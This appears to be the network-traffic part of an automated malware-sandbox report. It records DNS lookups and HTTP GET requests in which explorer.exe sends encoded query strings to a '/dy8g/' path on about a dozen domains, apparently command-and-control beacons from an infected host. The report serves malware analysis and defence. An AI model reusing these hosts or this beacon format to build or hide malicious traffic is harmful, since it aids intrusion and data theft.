                                                                                                                        Jun 22, 2021 18:26:06.789414883 CEST4977180192.168.2.675.2.81.221
                                                                                                                        Jun 22, 2021 18:26:06.803976059 CEST804977175.2.81.221192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:11.854918957 CEST4977280192.168.2.6154.196.232.108
                                                                                                                        Jun 22, 2021 18:26:12.085314989 CEST8049772154.196.232.108192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:12.085505962 CEST4977280192.168.2.6154.196.232.108
                                                                                                                        Jun 22, 2021 18:26:12.087053061 CEST4977280192.168.2.6154.196.232.108
                                                                                                                        Jun 22, 2021 18:26:12.319773912 CEST8049772154.196.232.108192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:12.319797039 CEST8049772154.196.232.108192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:12.319806099 CEST8049772154.196.232.108192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:12.320152044 CEST4977280192.168.2.6154.196.232.108
                                                                                                                        Jun 22, 2021 18:26:12.320415974 CEST4977280192.168.2.6154.196.232.108
                                                                                                                        Jun 22, 2021 18:26:17.814841986 CEST4977380192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:26:17.857904911 CEST804977334.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:17.859127998 CEST4977380192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:26:17.859261036 CEST4977380192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:26:17.902129889 CEST804977334.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:17.999823093 CEST804977334.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:17.999867916 CEST804977334.102.136.180192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:18.000039101 CEST4977380192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:26:18.000062943 CEST4977380192.168.2.634.102.136.180
                                                                                                                        Jun 22, 2021 18:26:18.043690920 CEST804977334.102.136.180192.168.2.6

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 22, 2021 18:24:00.034044981 CEST6134653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:00.094660997 CEST53613468.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:01.139225006 CEST5177453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:01.198174000 CEST53517748.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:02.101680040 CEST5602353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:02.155455112 CEST53560238.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:02.998409033 CEST5838453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:03.048787117 CEST53583848.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:04.183419943 CEST6026153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:04.241441965 CEST53602618.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:05.152579069 CEST5606153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:05.205853939 CEST53560618.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:06.185880899 CEST5833653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:06.243319988 CEST53583368.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:07.209156990 CEST5378153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:07.268709898 CEST53537818.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:08.178642988 CEST5406453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:08.235013962 CEST53540648.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:09.148130894 CEST5281153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:09.199281931 CEST53528118.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:10.063783884 CEST5529953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:10.123028040 CEST53552998.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:11.019716024 CEST6374553192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:11.101739883 CEST53637458.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:12.446943045 CEST5005553192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:12.514972925 CEST53500558.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:13.694725990 CEST6137453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:13.747822046 CEST53613748.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:14.620474100 CEST5033953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:14.673840046 CEST53503398.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:15.526808023 CEST6330753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:15.583053112 CEST53633078.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:16.860541105 CEST4969453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:16.919770956 CEST53496948.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:18.071145058 CEST5498253192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:18.124247074 CEST53549828.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:20.092732906 CEST5001053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:20.148947001 CEST53500108.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:32.629328012 CEST6371853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:32.698751926 CEST53637188.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:53.409738064 CEST6211653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:53.559686899 CEST53621168.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:54.466840982 CEST6381653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:54.624713898 CEST53638168.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:55.251815081 CEST5501453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:55.316796064 CEST53550148.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:55.794864893 CEST6220853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:55.855622053 CEST53622088.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:55.968133926 CEST5757453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.027344942 CEST53575748.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.043406963 CEST5181853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.121126890 CEST53518188.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.237652063 CEST5662853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.300812960 CEST53566288.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.397944927 CEST6077853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.466319084 CEST53607788.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.508342028 CEST5379953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.573071003 CEST53537998.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.601552963 CEST5468353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.654877901 CEST53546838.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:56.749758959 CEST5932953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:56.824110985 CEST53593298.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:57.171281099 CEST6402153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:57.239022017 CEST53640218.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:57.662734032 CEST5612953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:57.722476006 CEST53561298.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:58.639910936 CEST5817753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:58.690794945 CEST53581778.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:24:59.686248064 CEST5070053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:24:59.747941971 CEST53507008.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:00.317605972 CEST5406953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:00.377165079 CEST53540698.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:00.581388950 CEST6117853192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:00.643455029 CEST53611788.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:02.295726061 CEST5701753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:02.361603022 CEST53570178.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:07.573002100 CEST5632753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:07.642466068 CEST53563278.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:12.875062943 CEST5024353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:12.949099064 CEST53502438.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.198398113 CEST6205553192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:18.266730070 CEST53620558.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.461308002 CEST6124953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:23.532597065 CEST53612498.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:28.739301920 CEST6525253192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:28.953159094 CEST53652528.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:34.369805098 CEST6436753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:34.678531885 CEST53643678.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:37.898433924 CEST5506653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:37.977202892 CEST53550668.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:38.901002884 CEST6021153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:38.975933075 CEST53602118.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.699645996 CEST5657053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:39.783648968 CEST53565708.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:44.923053980 CEST5845453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:44.998709917 CEST53584548.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:50.441529036 CEST5518053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:50.750444889 CEST53551808.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:00.962518930 CEST5872153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.023313046 CEST53587218.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:01.347481966 CEST5769153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.425106049 CEST53576918.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:01.534457922 CEST5294353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.609908104 CEST53529438.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.486386061 CEST5948953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:06.553442001 CEST53594898.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:11.774780035 CEST6402253192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:11.852895021 CEST53640228.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:17.734756947 CEST6002353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:17.813395023 CEST53600238.8.8.8192.168.2.6

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Jun 22, 2021 18:25:02.295726061 CEST192.168.2.68.8.8.80xaf89Standard query (0)www.invisiongc.netA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:07.573002100 CEST192.168.2.68.8.8.80x7d4cStandard query (0)www.killrstudio.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:12.875062943 CEST192.168.2.68.8.8.80x6cadStandard query (0)www.ivoirepneus.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:18.198398113 CEST192.168.2.68.8.8.80x5255Standard query (0)www.extinctionbrews.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:23.461308002 CEST192.168.2.68.8.8.80x14f9Standard query (0)www.cindywillardrealtor.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:28.739301920 CEST192.168.2.68.8.8.80x2779Standard query (0)www.doityourselfism.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:34.369805098 CEST192.168.2.68.8.8.80x5716Standard query (0)www.saludflv.infoA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:39.699645996 CEST192.168.2.68.8.8.80xc48eStandard query (0)www.builtbydawn.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:44.923053980 CEST192.168.2.68.8.8.80xeaa6Standard query (0)www.qq66520.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:50.441529036 CEST192.168.2.68.8.8.80xf777Standard query (0)www.mzyxi-rkah-y.netA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:01.347481966 CEST192.168.2.68.8.8.80x84beStandard query (0)www.avito-payment.lifeA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:06.486386061 CEST192.168.2.68.8.8.80x2016Standard query (0)www.thenorthgoldline.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:11.774780035 CEST192.168.2.68.8.8.80x5665Standard query (0)www.guys-only.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:17.734756947 CEST192.168.2.68.8.8.80xfb0dStandard query (0)www.wideawakemomma.comA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Jun 22, 2021 18:25:02.361603022 CEST8.8.8.8192.168.2.60xaf89No error (0)www.invisiongc.netinvisiongc.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:02.361603022 CEST8.8.8.8192.168.2.60xaf89No error (0)invisiongc.net34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:07.642466068 CEST8.8.8.8192.168.2.60x7d4cNo error (0)www.killrstudio.comkillrstudio.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:07.642466068 CEST8.8.8.8192.168.2.60x7d4cNo error (0)killrstudio.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:12.949099064 CEST8.8.8.8192.168.2.60x6cadNo error (0)www.ivoirepneus.com213.186.33.5A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:18.266730070 CEST8.8.8.8192.168.2.60x5255No error (0)www.extinctionbrews.comextinctionbrews.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:18.266730070 CEST8.8.8.8192.168.2.60x5255No error (0)extinctionbrews.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:23.532597065 CEST8.8.8.8192.168.2.60x14f9No error (0)www.cindywillardrealtor.comcindywillardrealtor.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:23.532597065 CEST8.8.8.8192.168.2.60x14f9No error (0)cindywillardrealtor.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:28.953159094 CEST8.8.8.8192.168.2.60x2779No error (0)www.doityourselfism.comdoityourselfism.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:28.953159094 CEST8.8.8.8192.168.2.60x2779No error (0)doityourselfism.com169.62.77.158A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:34.678531885 CEST8.8.8.8192.168.2.60x5716Server failure (2)www.saludflv.infononenoneA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:39.783648968 CEST8.8.8.8192.168.2.60xc48eNo error (0)www.builtbydawn.com172.67.129.33A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:39.783648968 CEST8.8.8.8192.168.2.60xc48eNo error (0)www.builtbydawn.com104.21.2.115A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:44.998709917 CEST8.8.8.8192.168.2.60xeaa6No error (0)www.qq66520.com166.88.88.176A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:50.750444889 CEST8.8.8.8192.168.2.60xf777No error (0)www.mzyxi-rkah-y.net52.79.124.173A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:01.425106049 CEST8.8.8.8192.168.2.60x84beName error (3)www.avito-payment.lifenonenoneA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:06.553442001 CEST8.8.8.8192.168.2.60x2016No error (0)www.thenorthgoldline.com825610.parkingcrew.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:06.553442001 CEST8.8.8.8192.168.2.60x2016No error (0)825610.parkingcrew.net75.2.81.221A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:11.852895021 CEST8.8.8.8192.168.2.60x5665No error (0)www.guys-only.com154.196.232.108A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:17.813395023 CEST8.8.8.8192.168.2.60xfb0dNo error (0)www.wideawakemomma.comwideawakemomma.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:17.813395023 CEST8.8.8.8192.168.2.60xfb0dNo error (0)wideawakemomma.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.invisiongc.net
                                                                                                                        • www.killrstudio.com
                                                                                                                        • www.ivoirepneus.com
                                                                                                                        • www.extinctionbrews.com
                                                                                                                        • www.cindywillardrealtor.com
                                                                                                                        • www.doityourselfism.com
                                                                                                                        • www.builtbydawn.com
                                                                                                                        • www.qq66520.com
                                                                                                                        • www.mzyxi-rkah-y.net
                                                                                                                        • www.thenorthgoldline.com
                                                                                                                        • www.guys-only.com
                                                                                                                        • www.wideawakemomma.com

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.64975634.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:02.409568071 CEST4856OUTGET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1
                                                                                                                        Host: www.invisiongc.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:02.550642014 CEST4857INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:02 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.64975734.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:07.686913967 CEST5602OUTGET /dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.killrstudio.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:07.827526093 CEST5603INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:07 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60cf306c-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        10192.168.2.649772154.196.232.10880C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:26:12.087053061 CEST5669OUTGET /dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.guys-only.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:26:12.319773912 CEST5669INHTTP/1.1 200 OK
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                        X-Powered-By: Nginx
                                                                                                                        Date: Tue, 22 Jun 2021 16:26:14 GMT
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                        Data Ascii: 3
                                                                                                                        Jun 22, 2021 18:26:12.319797039 CEST5669INData Raw: 35 62 0d 0a e5 bd 93 e5 89 8d e5 9f 9f e5 90 8d e6 88 96 e8 80 85 e7 ab af e5 8f a3 e6 9c aa e7 bb 91 e5 ae 9a 2c e8 af b7 e5 88 b0 e5 90 8e e5 8f b0 e7 bb 91 e5 ae 9a ef bc 8c e8 af a5 e6 b6 88 e6 81 af e5 8f af e4 bb a5 e5 9c a8 e5 90 8e e5 8f
                                                                                                                        Data Ascii: 5b,
                                                                                                                        Jun 22, 2021 18:26:12.319806099 CEST5669INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        11192.168.2.64977334.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:26:17.859261036 CEST5670OUTGET /dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== HTTP/1.1
                                                                                                                        Host: www.wideawakemomma.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:26:17.999823093 CEST5671INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:26:17 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.649758213.186.33.580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:13.103247881 CEST5616OUTGET /dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== HTTP/1.1
                                                                                                                        Host: www.ivoirepneus.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:13.156203032 CEST5617INHTTP/1.1 302 Moved Temporarily
